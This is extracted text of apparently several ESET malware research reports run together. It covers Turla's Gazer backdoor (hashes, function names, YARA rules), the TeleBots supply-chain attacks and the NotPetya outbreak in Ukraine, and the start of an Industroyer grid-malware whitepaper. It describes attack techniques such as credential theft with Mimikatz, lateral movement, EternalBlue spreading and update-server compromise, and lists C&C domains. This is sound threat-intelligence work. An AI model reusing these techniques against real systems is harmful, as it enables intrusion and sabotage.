{531511FA-190D-5D85-8A4A-279F2F592CC7}
Gazing at Gazer
Turla
s new second stage backdoor
Hashes
Table 6.
Gazer sample hashes
SHA1 hash
Component
27fa78de705ebaa4b11c4b5fe7277f91906b3f92
Gazer wiper x32
35f205367e2e5f8a121925bbae6ff07626b526a7
Gazer loader x32
b151cd7c4f9e53a8dcbdeb7ce61ccdd146eb68ab
e40bb5beec5678537e8fe537f872b2ad6b77e08a
522e5f02c06ad215c9d0c23c5a6a523d34ae4e91
c380038a57ffb8c064851b898f630312fabcbba7
267f144d771b4e2832798485108decd505cb824a
52f6d09cccdbc38d66c184521e7ccf6b28c4b4d9
475c59744accb09724dae610763b7284646ab63f
22542a3245d52b7bcdb3eaef5b8b2693f451f497
2b9faa8b0fcadac710c7b2b93d492ff1028b5291
e05ab6978c17724b7c874f44f8a6cbfb1c56418d
6dec3438d212b67356200bbac5ec7fa41c716d86
b548863df838069455a76d2a63327434c02d0d9d
Gazer loader x32
Gazer loader x32
Gazer loader x64
Gazer loader x64
Gazer loader x64
Gazer loader x32
Gazer loader x32
Gazer loader x32
Gazer loader x64
Gazer loader x64
Gazer loader x64
Gazer loader x64
Compilation
Time
07/04/2016
15:04:24
05/02/2002
17:36:10
05/02/2002
17:36:10
05/02/2002
17:36:10
05/02/2002
17:36:26
05/02/2002
17:36:26
05/02/2002
17:36:26
04/10/2002
18:31:37
04/10/2002
18:31:37
04/10/2002
18:31:37
04/10/2002
18:34:18
04/10/2002
18:34:18
04/10/2002
18:34:18
09/01/2016
19:30:10
Certificate
Eset Detection
Name
not signed
Win32/Turla.CL
admin@solidloop.org
valid from 14/10/2015
Win32/Turla.CC
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win32/Turla.CC
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win32/Turla.CC
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win64/Turla.AA
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win64/Turla.AA
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win64/Turla.AA
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win32/Turla.CC
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win32/Turla.CC
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win32/Turla.CC
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win64/Turla.AA
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win64/Turla.AA
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win64/Turla.AA
to 14/10/2016
not signed
Win64/Turla.AA
admin@
c3e6511377dfe85a34e19b33575870dda8884c3c
Gazer loader x64
06/02/2016
ultimatecomsup.biz
19:29:15
valid from 16/12/2015
Win64/Turla.AA
to 16/12/2017
admin@
9ff4f59ca26388c37d0b1f0e0b22322d926e294a
Gazer loader x64
16/02/2016
ultimatecomsup.biz
16:00:44
valid from 16/12/2015
to 16/12/2017
Win64/Turla.AA
Gazing at Gazer
Turla
s new second stage backdoor
SHA1 hash
Component
Compilation
Time
Certificate
18/02/2016
ultimatecomsup.biz
15:29:58
valid from 16/12/2015
Eset Detection
Name
admin@
029aa51549d0b9222db49a53d2604d79ad1c1e59
Gazer loader x64
Win64/Turla.AA
to 16/12/2017
admin@
cecc70f2b2d50269191336219a8f893d45f5e979
Gazer loader x64
01/01/2017
ultimatecomsup.biz
08:39:30
valid from 16/12/2015
Win64/Turla.AG
to 16/12/2017
admin@
7fac4fc130637afab31c56ce0a01e555d5dea40d
Gazer loader x64
11/06/2017
ultimatecomsup.biz
23:43:51
valid from 16/12/2015
Win64/Turla.AD
to 16/12/2017
admin@
5838a51426ca6095b1c92b87e1be22276c21a044
Gazer loader x32
19/06/2017
ultimatecomsup.biz
01:28:51
valid from 16/12/2015
Win32/Turla.CF
to 16/12/2017
admin@
3944253f6b7019eed496fad756f4651be0e282b4
Gazer loader x64
19/06/2017
ultimatecomsup.biz
01:30:00
valid from 16/12/2015
Win64/Turla.AD
to 16/12/2017
228da957a9ed661e17e00efba8e923fd17fae054
295d142a7bdced124fdcc8edfe49b9f3acceab8a
0f97f599fab7f8057424340c246d3a836c141782
dbb185e493a0fdc959763533d86d73f986409f1b
4701828dee543b994ed2578b9e0d3991f22bd827
6fd611667ba19691958b5b72673b9b802edd7ff8
fcabeb735c51e2b8eb6fb07bda8b95401d069bd8
75831df9cbcfd7bf812511148d2a0f117324a75f
bae3ae65c32838fb52a0f5ad2cde8659d2bff9f3
37ff6841419adc51eeb8756660b2fb46f3eb24ed
9e6de3577b463451b7afce24ab646ef62ad6c2bd
795c6ee27b147ff0a05c0477f70477e315916e0e
8184ad9d6bbd03e99a397f8e925fa66cfbe5cf1b
7ced96b08d7593e28fee616eccbc6338896517cf
63c534630c2ce0070ad203f9704f1526e83ae586
23f1e3be3175d49e7b262cd88cfd517694dcba18
Gazer
05/02/2002
orchestrator x32
Gazer
17:31:28
05/02/2002
orchestrator x32
Gazer
17:31:28
05/02/2002
orchestrator x32
Gazer
17:31:28
05/02/2002
orchestrator x32
Gazer
17:31:28
05/02/2002
orchestrator x64
Gazer
17:34:25
05/02/2002
orchestrator x64
Gazer
17:34:25
05/02/2002
orchestrator x64
Gazer
17:34:25
04/10/2002
orchestrator x32
Gazer
18:31:28
04/10/2002
orchestrator x32
Gazer
18:31:28
04/10/2002
orchestrator x64
Gazer
18:33:02
04/10/2002
orchestrator x64
Gazer
18:33:02
04/10/2002
orchestrator x64
Gazer
18:33:02
09/01/2016
orchestrator x64
Gazer
19:28:29
06/02/2016
orchestrator x64
Gazer
19:29:04
06/02/2016
orchestrator x64
Gazer
19:29:04
18/02/2016
orchestrator x64
15:29:32
not signed
Win32/Turla.CF
not signed
Win32/Turla.CF
not signed
Win32/Turla.CF
not signed
Win32/Turla.CC
not signed
Win64/Turla.AA
not signed
Win64/Turla.AA
not signed
Win64/Turla.AA
not signed
Win32/Turla.CC
not signed
Win32/Turla.CC
not signed
Win64/Turla.AA
not signed
Win64/Turla.AA
not signed
Win64/Turla.AA
not signed
Win64/Turla.AA
not signed
Win64/Turla.AA
not signed
Win64/Turla.AA
not signed
Win64/Turla.AA
Gazing at Gazer
Turla
s new second stage backdoor
SHA1 hash
7a6f1486269abdc1d658db618dc3c6f2ac85a4a7
11b35320fb1cf21d2e57770d8d8b237eb4330eaa
e8a2bad87027f2bf3ecae477f805de13fccc0181
950f0b0c7701835c5fbdb6c5698a04b8afe068e6
Component
Compilation
Time
Gazer
01/01/2017
orchestrator x64
Gazer
08:39:19
11/06/2017
orchestrator x64
Gazer
23:42:28
19/06/2017
orchestrator x32
Gazer
01:28:21
19/06/2017
orchestrator x64
01:29:46
a5eec8c6aadf784994bf68d9d937bb7af3684d5c Gazer comm x64
411ef895fe8dd4e040e8bf4048f4327f917e5724
Gazer comm x32
c1288df9022bcd2c0a217b1536dfa83928768d06
Gazer comm x32
4b6ef62d5d59f2fe7f245dd3042dc7b83e3cc923
Gazer comm x32
7f54f9f2a6909062988ae87c1337f3cf38d68d35
Gazer wiper x32
05/02/2002
17:57:07
05/02/2002
17:58:22
06/02/2016
19:23:52
11/06/2017
23:44:24
05/02/2002
17:39:07
Certificate
Eset Detection
Name
not signed
Win64/Turla.AG
not signed
Win64/Turla.AD
not signed
Win32/Turla.CF
not signed
Win64/Turla.AD
admin@solidloop.org
valid from 14/10/2015
Win64/Turla.AH
to 14/10/2016
admin@solidloop.org
valid from 14/10/2015
Win32/Turla.CC
to 14/10/2016
not signed
Win32/Turla.CC
not signed
Win32/Turla.CF
admin@solidloop.org
valid from 14/10/2015
to 14/10/2016
Win32/Turla.CL
Gazing at Gazer
Turla
s new second stage backdoor
Appendices
Function names
There are a few samples of Gazer that use the current function name as first parameter for the log
function. Here is a list of some function names used in Gazer:
AutorunManager Class
AutorunManager::~AutorunManger
AutorunManager::Init
AutorunManger::ReInit
AutorunManager::BuildAutorunSettings
AutorunManager::FreeAutorunsSettings
AutorunManager::FullCheck
AutorunManager::StartAutorunEx
AutorunManager::FullStart
HiddenTaskAutorun Class
HiddenTaskAutorun::IsPathsEqual
LinkAutorun Class
LinkAutorunClass::InfectLnkFile
LinkAutorunClass::ClearLnkFile
LinkAutorunClass::CheckLnkFile
RemoteImport32 Class
RemoteImport32::RemoteImport32
RemoteImport32::GetRemoteProcAddress
RemoteImport32::GetRemoteModuleHandle
ScreenSaverAutorun Class
ScreenSaverAutorun::ChangeScreenSaver
ScreenSaverAutorun::WndProc1
ScreenSaverAutorun::GetMessageThreadProc
ScreenSaverAutorun::CreateHiddenWindow
ScreenSaverAutorun::CloseHiddenWindow
ShellAutorun Class
ShellAutorun::AutorunInstallEx
ShellAutorun::AutorunUninstallEx
ShellAutorun::AutorunCheckEx
ShellAutorun::IsPathsEqual
StartupAutorun Class
StartupAutorun::AutorunInstallEx
StartupAutorun::AutorunUninstallEx
StartupAutorun::AutorunCheckEx
StartupAutorun::IsPathsEqual
TaskScheduler20Autorun Class
TaskScheduler20Autorun::Init
TaskScheduler20Autorun::AutorunCheckEx
TaskScheduler20Autorun::AutorunInstallEx
TaskScheduler20Autorun::AutorunUninstallEx
TaskScheduler20Autorun::IsPathsEqual
Gazing at Gazer
Turla
s new second stage backdoor
DllInjector Class
DllInjector::LoadDllToProcess
DllInjector::GetProcHandle
DllInjector::CheckDllAndSetPlatform
DllInjector::CopyDllFromBuffer
DllInjector::MapLibrary
DllInjector::Map86Library_tox64
DllInjector::CallEntryPoint
DllInjector::FindDllImageBase
DllInjector::WindowInject
InjectManager Class
InjectManager::~InjectManager
InjectManager::BuildInjectSettingsList
InjectManager::FreeInjectSettingsList
InjectManager::Stop
InjectManager::DetachAll
InjectManager::FindAndInjectInVictim
InjectManager::FindProcessSimple2
InjectManager::LoadNtdll
InjectManager::UnLoadNtdll
InjectManager::LoadWinsta
InjectManager::UnLoadWinsta
InjectManager::SetStatusTransportDll
InjectManager::GetTransportState
InjectManager::DestroyManuallyCreatedVictim
InjectManager::VictimManualCreateIE
TNPTransport Class
TNPTransport::Init
TNPTransport::ReInit
TNPTransport::~TNPTransport
TNPTransport::Receive
TNPTransport::RunServer
TNPTransport::ServerProc
ExeStorage Class
ExeStorage::Migrate
ExeStorage::SecureHeapFree
FSStorage Class
FSStorage::~FSStorage
FSStorage::Init
FSStorage::GetBlock
FSStorage::GetListBlock
FSStorage::Migrate
FSStorage::SecureHeapFree
FSStorage::Update
FSStorage::Empty
RegStorage Class
RegStorage::~RegStorage
RegStorage::Init
RegStorage::FreeList
Gazing at Gazer
Turla
s new second stage backdoor
RegStorage::GetListBlock
RegStorage::DeleteListBlock
RegStorage::Migrate
RegStorage::SecureHeapFree
RegStorage::Update
RegStorage::Empty
ResultQueue Class
ResultQueue::~ResultQueue
ResultQueue::DumpQueueToStorage
ResultQueue::RestoreFromStorage
ResultQueue::ClearQueue
ResultQueue::RemoveResult
ResultQueue::GetNextResultToSendWithModule
ResultQueue::SetPredeterminedResult
ResultQueue::print
TaskQueue Class
TaskQueue::~TaskQueue
TaskQueue::DumpQueueToStorage
TaskQueue::RestoreFromStorage
TaskQueue::ClearQueue
TaskQueue::RemoveCompletedTasks
TaskQueue::print
CExecutionSubsystem Class
CExecutionSubsystem::~CExecutionSubsystem
CExecutionSubsystem::Stop
CExecutionSubsystem::TaskExecusion
CExecutionSubsystem::TaskConfigure
CExecutionSubsystem::TaskUpload
CExecutionSubsystem::TaskDownload
CExecutionSubsystem::TaskReplacement
CExecutionSubsystem::TaskDelete
CExecutionSubsystem::TaskPacketLocalTransport
CExecutionSubsystem::FinishTask
CExecutionSubsystem::PushTaskResult
CExecutionSubsystem::UpdateStorage
CMessageProcessingSystem Class
CMessageProcessingSystem::~CMessageProcessing
CMessageProcessingSystem::ListenerCallBack
CMessageProcessingSystem::WaitShutdownModule
CMessageProcessingSystem::SetCompulsorySMC
CMessageProcessingSystem::UnSetCompulsorySMC
CMessageProcessingSystem::IsCompulsorySMC
CMessageProcessingSystem::GetCompulsorySMC
CMessageProcessingSystem::Receive_TAKE_NOP
CMessageProcessingSystem::Receive_GIVE_SETTINGS
CMessageProcessingSystem::Receive_TAKE_CAN_NOT_WORK
CMessageProcessingSystem::Receive_GIVE_CACHE
CMessageProcessingSystem::Receive_TAKE_CACHE
CMessageProcessingSystem::Receive_TAKE_TASK
CMessageProcessingSystem::Receive_GIVE_RESULT
Gazing at Gazer
Turla
s new second stage backdoor
CMessageProcessingSystem::Receive_TAKE_CONFIRM_RESULT
CMessageProcessingSystem::Receive_TAKE_LOADER_BODY
CMessageProcessingSystem::Receive_TAKE_UNINSTALL
CMessageProcessingSystem::Receive_NO_CONNECT_TO_Gazer
CMessageProcessingSystem::Receive_TAKE_LAST_CONNECTION
CMessageProcessingSystem::Send_TAKE_FIN
CMessageProcessingSystem::Send_TAKE_SHUTDOWN
CMessageProcessingSystem::Send_TAKE_SETTINGS
CMessageProcessingSystem::Send_TAKE_RESULT
Crypto Class
Crypto::GetPublicKey
Crypto::EncryptRSA
Crypto::Sign
Crypto::EncryptAndSignBufferRSAEx
Crypto::DecryptRSA
Crypto::Verify
Crypto::DecryptAndVerifyBufferRSAEx
Crypto::EncryptAndSignBufferRSA1
Crypto::EncryptAndSignBufferRSAC
Crypto::DecryptAndVerifyBufferRSA0
Crypto::DecryptAndVerifyBufferRSA1
Crypto::DecryptAndVerifyBufferRSAL
Crypto::VerifyLoaderFile
Crypto::VerifyLoader
Crypto::CompressBuffer
Crypto::DecompressBuffer
LTManager Class
LTManager::~LTManager
LTManager::Init
LTManager::GetResultFromQueue
LTManager::SetResultToCache
LTManager::GetTaskFromCache
LTManager::SetTaskToQueue
LTManager::IsSendPacketFurtherOnRoute
LTManager::SendPacketNextRouteUnit
LTManager::SetCache
LTManager::SetPacket
LTManager::DumpCacheToStorage
LTManager::DeSerializeCache
LTManager::DeSerializePacket
LTManager::DeSerializeRoute
LTManager::DeSerializeTask
LTManager::DeSerializeResult
LTManager::SerializeCache
LTManager::SerializePacket
LTManager::SerialiazeRoute
LTManager::SerializeTask
LTManager::SerializeResult
LTManager::ClearCache
LTManager::ClearPacket
LTManager::ClearRoute
Gazing at Gazer
Turla
s new second stage backdoor
LTManager::ClearTask
LTManager::ClearResult
LTManager::PrintCache
LTManager::CreateEvents
LTManager::SetEvents
LTManager::ResetEvents
LTManager::WaitEvents
LTManager::DeleteEvents
LTMessageProcessing Class
LTMessageProcessing::ListenerCallBack
LTMessageProcessing::Send_TAKE_OK
LTMessageProcessing::Send_TAKE_ERROR_CRYPT
LTMessageProcessing::Send_TAKE_ERROR_UNKNOWN
LTNamedPipe Class
LTNamedPipe::ReInit
LTNamedPipe::BuildLocalTransportSettings
LTNamedPipe::~LTNamedPipe
LTNamedPipe::Receive
LTNamedPipe::RunServer
LTNamedPipe::Stop
LTNamedPipe::CreateNewNPInstance
LTNamedPipe::ServerProc
LTNamedPipe::ClientCommunication
Yara rules
import
import
math
import
hash
rule Gazer_certificate_subject {
condition:
for any i in (0..pe.number_of_signatures - 1):
(pe.signatures[i].subject contains
Solid Loop
pe.signatures[i].subject contains
Ultimate Computer Support
rule Gazer_certificate
strings:
$certif1 = {52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02}
$certif2 = {12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c}
condition:
(uint16(0) == 0x5a4d) and 1 of them and filesize < 2MB
rule Gazer_logfile_name
strings:
$s1 =
CVRG72B5.tmp.cvr
$s2 =
CVRG1A6B.tmp.cvr
$s3 =
CVRG38D9.tmp.cvr
condition:
(uint16(0) == 0x5a4d) and 1 of them
TeleBots are back: Supply-chain attacks against Ukraine
welivesecurity.com /2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/
6/30/2017
By Anton Cherepanov posted 30 Jun 2017 - 03:30PM
Ransomware
The latest Petya-like outbreak has gathered a lot of attention from the media. However, it should be noted that this
was not an isolated incident: this is the latest in a series of similar attacks in Ukraine. This blogpost reveals many
details about the Diskcoder.C (aka ExPetr, PetrWrap, Petya, or NotPetya) outbreak and related information about
previously unpublished attacks.
1/11
Figure 1
The timeline of supply-chain attacks in Ukraine.
TeleBots
In December 2016 we published two detailed blogposts about disruptive attacks conducted by the group ESET
researchers call TeleBots, specifically about attacks against financial institutions and a Linux version of the KillDisk
malware used by this group. The group mounted cyberattacks against various computer systems in Ukraine;
systems that can be defined as critical infrastructure. Moreover, this group has connections with the infamous
BlackEnergy group that was responsible for the December 2015 power outages in Ukraine.
In the final stage of its attacks, the TeleBots group always used the KillDisk malware to overwrite files with specific
file extensions on the victims
disks. Putting the cart before the horse: collecting ransom money was never the top
priority for the TeleBots group. The KillDisk malware used in the first wave of December 2016 attacks, instead of
encrypting, simply overwrites targeted files. Further, it did not provide contact information for communicating with the
attacker; it just displayed an image from the Mr. Robot TV show.
2/11
Figure 2
The picture displayed by KillDisk malware in the first wave of December 2016 attacks.
In the second wave of attacks, the cybersaboteurs behind the KillDisk malware added contact information to the
malware, so it would look like a typical ransomware attack. However, the attackers asked for an extraordinary
number of bitcoins: 222 BTC (about $250,000 at that time). This might indicate that they were not interested in
bitcoins, but their actual aim was to cause damage to attacked companies.
Figure 3
The ransom demand displayed by KillDisk in the second wave of December 2016 attacks.
In 2017, the TeleBots group didn
t stop their cyberattacks; in fact, they became more sophisticated. In the period
between January and March 2017 the TeleBots attackers compromised a software company in Ukraine (not related
to M.E. Doc), and, using VPN tunnels from there, gained access to the internal networks of several financial
institutions.
During that attack, those behind TeleBots enhanced their arsenal with two pieces of ransomware and updated
versions of tools mentioned in the previously-linked blogposts.
The first backdoor that the TeleBots group relied heavily on was Python/TeleBot.A, which was rewritten from Python
3/11
in the Rust programming language. The functionality remains the same: it is a standard backdoor that uses the
Telegram Bot API in order to receive commands from, and send responses to, the malware operator.
Figure 4
Disassembled code of the Win32/TeleBot.AB trojan.
The second backdoor, which was written in VBS and packaged using the script2exe program, was heavily
obfuscated but the functionality remained the same as in previous attacks.
Figure 5
The obfuscated version of the VBS backdoor.
This time the VBS backdoor used the C&C server at 130.185.250[.]171. To make connections less suspicious for
those who check firewall logs, the attackers registered the domain transfinance.com[.]ua and hosted it on that IP
address. As is evident from Figure 6 this server was also running the Tor relay named severalwdadwajunior.
4/11
Figure 6
Information about Tor relay run by the TeleBots group.
In addition, the attacker used the following tools:
CredRaptor (password stealer)
Plainpwd (modified Mimikatz used for recovering Windows credentials from memory)
SysInternals
PsExec (used for lateral movement)
As mentioned above, in the final stage of their attacks, the TeleBots attackers pushed ransomware using stolen
Windows credentials and SysInternals
PsExec. This new ransomware was detected by ESET products as
Win32/Filecoder.NKH. Once executed, this ransomware encrypts all files (except files located in the C:\Windows
directory) using AES-128 and RSA-1024 algorithms. The malware adds the .xcrypted file extension to alreadyencrypted files.
When encryption is done, this filecoder malware creates a text file !readme.txt with the following content:
Please contact us: openy0urm1nd@protonmail.ch
In addition to Windows malware, the TeleBots group used Linux ransomware on non-Windows servers. This
ransomware is detected by ESET products as Python/Filecoder.R and, predictably, it is written in the Python
programming language. This time attackers execute third-party utilities such as openssl in order to encrypt files. The
encryption is done using the RSA-2048 and AES-256 algorithms.
5/11
Figure 7
Python code of Linux ransomware Python/Filecoder.R used by the TeleBots group.
In the code of Python script, attackers left their comment which had following text:
feedback: openy0urm1nd[@]protonmail.ch
Win32/Filecoder.AESNI.C
On 18 May 2017, we noticed new activity on the part of another ransomware family Win32/Filecoder.AESNI.C (also
referred to as XData).
This ransomware was spread mostly in Ukraine, because of an interesting initial vector. According to our LiveGrid
telemetry, the malware was created right after execution of the M.E.Doc software that is widely used by accounting
personnel in Ukraine.
The Win32/Filecoder.AESNI.C ransomware had a spreading mechanism that allowed it to perform lateral movement
automatically, inside a compromised company LAN. Specifically, the malware had an embedded Mimikatz DLL that
it used to extract Windows account credentials from the memory of a compromised PC. With these credentials, the
malware started to spread inside its host network using SysInternals
PsExec utility.
It seems that the attackers either did not reach their goal on that occasion, or it was the test before a more effective
strike. The attackers posted master decryption keys on the BleepingComputer forum, along with the assertion that
this was done because the original author claimed that the source was stolen and used in the Ukraine incident.
ESET published a decryption tool for Win32/Filecoder.AESNI ransomware, and this event didn
t gain much media
attention.
Diskcoder.C (aka Petya-like) outbreak
What did gain a lot of media attention, however, was the Petya-like outbreak of 27 June, 2017, because it
successfully compromised a lot of systems in critical infrastructure and other businesses in Ukraine, and further
afield.
The malware in this attack has the ability to replace the Master Boot Record (MBR) with its own malicious code.
This code was borrowed from Win32/Diskcoder.Petya ransomware. That
s why some other malware researchers
6/11
have named this threat as ExPetr, PetrWrap, Petya, or NotPetya. However, unlike the original Petya ransomware,
Diskcoder.C
s authors modified the MBR code in such a way that recovery won
t be possible. Specifically, the
attacker cannot provide a decryption key and the decryption key cannot be typed in the ransom screen, because the
generated key contains non-acceptable characters.
Visually this MBR part of Diskcoder.C looks like a slightly modified version of Petya: at first it displays a message
that impersonates CHKDSK, Microsoft
s disk checking utility. During the faux CHKDISK scan Diskcoder.C actually
encrypts the data.
Figure 8
Fake CHKDSK message displayed by Diskcoder.C.
When encryption is complete, the MBR code displays the next message with payment instructions, but as noted
before this information is useless.
Figure 9
Diskcoder.C message with payment instructions.
The remainder of the code, other than the borrowed MBR, was implemented by the authors themselves. This
includes file encryption that can be used as a complement to the disk-encrypting MBR. For file encryption, the
7/11
malware uses the AES-128 and RSA-2048 algorithms. It should be noted that the authors made mistakes that make
decryption of files less possible. Specifically, the malware encrypts only the first 1MB of data and it does not write
any header or footer, only raw encrypted data and does not rename encrypted files, so it
s hard to say which files are
encrypted and which are not. In addition to that, files that are larger than 1MB after encryption do not contain
padding, so there is no way to verify the key.
Interestingly, the list of target file extensions is not identical but is very similar to the file extensions list from the
KillDisk malware used in the December 2016 attacks.
Figure 10
List of target file extensions from Diskcoder.C.
Once the malware is executed it attempts to spread using the infamous EternalBlue exploit, leveraging the
DoublePulsar kernel-mode backdoor. Exactly the same method was used in the WannaCryptor.D ransomware.
Diskcoder.C also adopted the method from the Win32/Filecoder.AESNI.C (aka XData) ransomware: it uses a
lightweight version of Mimikatz to obtain credentials and then executes the malware using SysInternals
PsExec on
other machines on the LAN. In addition to that, the attackers implemented a third method of spreading using a WMI
mechanism.
All three of these methods have been used to spread malware inside LANs. Unlike the infamous WannaCryptor
malware, the EternalBlue exploit is used by Diskcoder.C only against computers within the local network address
space.
Why are there infections in other countries than Ukraine? Our investigation revealed that affected companies in
other countries had VPN connections to their branches, or to business partners, in Ukraine.
Initial infection vector
Both Diskcoder.C and Win32/Filecoder.AESNI.C used a supply-chain attack as the initial infection vector. These
malware families were spread using Ukrainian accounting software called M.E.Doc.
There are several options for how this attack can be implemented. The M.E.Doc has an internal messaging and
document exchange system so attackers could send spearphishing messages to victims. User interaction is
required in order to execute something malicious in this way. Thus, social engineering techniques would be
involved. Since Win32/Filecoder.AESNI.C didn
t spread so widely, we mistakenly assumed that these techniques
were used in this case.
However, the subsequent Diskcoder.C outbreak suggests that the attackers had access to the update server of the
legitimate software. Using access to this server, attackers pushed a malicious update that was applied automatically
without user interaction. That
s why so many systems in Ukraine were affected by this attack. However, it seems
like the malware authors underestimated the spreading capabilities of Diskcoder.C.
ESET researchers found evidence that supports this theory. Specifically, we identified a malicious PHP backdoor
that was deployed under medoc_online.php in one of the FTP directories on M.E.Doc
s server. This backdoor was
accessible from HTTP; however, it was encrypted, so the attacker would have to have the password in order to use
8/11
Figure 11
Listing of FTP directory containing the PHP backdoor.
We should say that there are signs that suggest that Diskcoder.C and Win32/Filecoder.AESNI.C were not the only
malware families that were deployed using that infection vector. We can speculate that these malicious updates
were deployed in a stealthy way to computer networks that belong to high-value targets.
One such malware that was deployed via this possible compromised M.E.Doc update server mechanism was the
VBS backdoor used by the TeleBots group. This time the attacker again used a financially-themed domain name:
bankstat.kiev[.]ua.
On the day of the Diskcoder.C outbreak, the A-record of this domain was changed to 10.0.0.1
Conclusions
The TeleBots group continues to evolve in order to conduct disruptive attacks against Ukraine. Instead of
spearphishing emails with documents containing malicious macros, they used a more sophisticated scheme known
as a supply-chain attack. Prior to the outbreak, the Telebots group targeted mainly the financial sector. The latest
outbreak was directed against businesses in Ukraine, but they apparently underestimated the malware
spreading
capabilities. That
s why the malware went out of control.
Indicators of Compromise (IoC)
ESET detection names:
Win32/TeleBot trojan
VBS/Agent.BB trojan
VBS/Agent.BD trojan
VBS/Agent.BE trojan
Win32/PSW.Agent.ODE trojan
Win64/PSW.Agent.K trojan
Python/Filecoder.R trojan
Win32/Filecoder.AESNI.C trojan
Win32/Filecoder.NKH trojan
Win32/Diskcoder.C trojan
Win64/Riskware.Mimikatz application
Win32/RiskWare.Mimikatz application
C&C servers:
9/11
transfinance.com[.]ua (IP: 130.185.250.171)
bankstat.kiev[.]ua (IP: 82.221.128.27)
www.capital-investing.com[.]ua (IP: 82.221.131.52)
Legitimate servers abused by malware authors:
api.telegram.org (IP: 149.154.167.200, 149.154.167.197, 149.154.167.198, 149.154.167.199)
VBS backdoor:
1557E59985FAAB8EE3630641378D232541A8F6F9
31098779CE95235FED873FF32BB547FFF02AC2F5
CF7B558726527551CDD94D71F7F21E2757ECD109
Mimikatz:
91D955D6AC6264FBD4324DB2202F68D097DEB241
DCF47141069AECF6291746D4CDF10A6482F2EE2B
4CEA7E552C82FA986A8D99F9DF0EA04802C5AB5D
4134AE8F447659B465B294C131842009173A786B
698474A332580464D04162E6A75B89DE030AA768
00141A5F0B269CE182B7C4AC06C10DEA93C91664
271023936A084F52FEC50130755A41CD17D6B3B1
D7FB7927E19E483CD0F58A8AD4277686B2669831
56C03D8E43F50568741704AEE482704A4F5005AD
38E2855E11E353CEDF9A8A4F2F2747F1C5C07FCF
4EAAC7CFBAADE00BB526E6B52C43A45AA13FD82B
F4068E3528D7232CCC016975C89937B3C54AD0D1
Win32/TeleBot:
A4F2FF043693828A46321CCB11C5513F73444E34
5251EDD77D46511100FEF7EBAE10F633C1C5FC53
Win32/PSW.Agent.ODE (CredRaptor):
759DCDDDA26CF2CC61628611CF14CFABE4C27423
77C1C31AD4B9EBF5DB77CC8B9FE9782350294D70
EAEDC201D83328AF6A77AF3B1E7C4CAC65C05A88
EE275908790F63AFCD58E6963DC255A54FD7512A
EE9DC32621F52EDC857394E4F509C7D2559DA26B
FC68089D1A7DFB2EB4644576810068F7F451D5AA
10/11
Win32/Filecoder.NKH:
1C69F2F7DEE471B1369BF2036B94FDC8E4EDA03E
Python/Filecoder.R:
AF07AB5950D35424B1ECCC3DD0EEBC05AE7DDB5E
Win32/Filecoder.AESNI.C:
BDD2ECF290406B8A09EB01016C7658A283C407C3
9C694094BCBEB6E87CD8DD03B80B48AC1041ADC9
D2C8D76B1B97AE4CB57D0D8BE739586F82043DBD
Win32/Diskcoder.C:
34F917AABA5684FBE56D3C57D48EF2A1AA7CF06D
PHP shell:
D297281C2BF03CE2DE2359F0CE68F16317BF0A86
11/11
WIN32/INDUSTROYER
A new threat for
industrial control systems
Anton Cherepanov, ESET
Version 2017-06-12
Win32/Industroyer
Contents
Win32/Industroyer: a new threat for industrial control systems . . . . . . . 2
Main backdoor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Additional backdoor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Launcher component . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
101 payload component . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6
104 payload component . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
61850 payload component . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
OPC DA payload component . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
Data wiper component . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Additional tools: port scanner tool . . . . . . . . . . . . . . . . . . . . . . . . 14
Additional tools: DoS tool . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Indicators of Compromise (IoC) . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Win32/Industroyer
Win32/Industroyer: a new threat for
industrial control systems
Win32/Industroyer is a sophisticated piece of malware designed to disrupt
the working processes of industrial control systems (ICS), specifically
industrial control systems used in electrical substations.
Those behind the Win32/Industroyer malware have a deep knowledge
and understanding of industrial control systems and, specifically, the
industrial protocols used in electric power systems. Moreover, it seems very
unlikely anyone could write and test such malware without access to the
specialized equipment used in the specific, targeted industrial environment.
this malware could have been the tool used by attackers to cause the
power outage in Ukraine in December 2016, although at the time of
writing, it is not confirmed, and the investigation is still ongoing. The
infection vector remains unknown.
The malware contains multiple modules, as analyzed and described in the
next sections of this whitepaper. However, before diving into those details,
the following simplified schematic shows the connections between the
components of the malware.
Support for four different industrial control protocols, specified in the
standards listed below, has been implemented by the malware authors:
IEC 60870-5-101 (aka IEC 101)
IEC 60870-5-104 (aka IEC 104)
IEC 61850
OLE for Process Control Data Access (OPC DA)
In addition to all that, the malware authors also wrote a tool that
implements a denial-of-service (DoS) attack against a particular family of
protection relays, specifically the Siemens SIPROTEC range.
All this considered, the Win32/Industroyer malware authors show an
intensive focus that suggests they are highly specialized in industrial
control systems.
The capabilities of this malware are significant. When compared to the
toolset used by threat actors in the 2015 attacks against the Ukrainian
power grid which culminated in a black out on December 23, 2015
(BlackEnergy, KillDisk, and other components, including legitimate
remote access software) the gang behind Industroyer are more advanced,
since they went to great lengths to create malware capable of directly
controlling switches and circuit breakers. We have seen indications that
Figure 1. Simplified schematic of Win32/Industroyer components.
While some components (e.g. Data wiper) are similar in concept to the 2015
BlackEnergy attacks against power grid companies in Ukraine, we don
t see
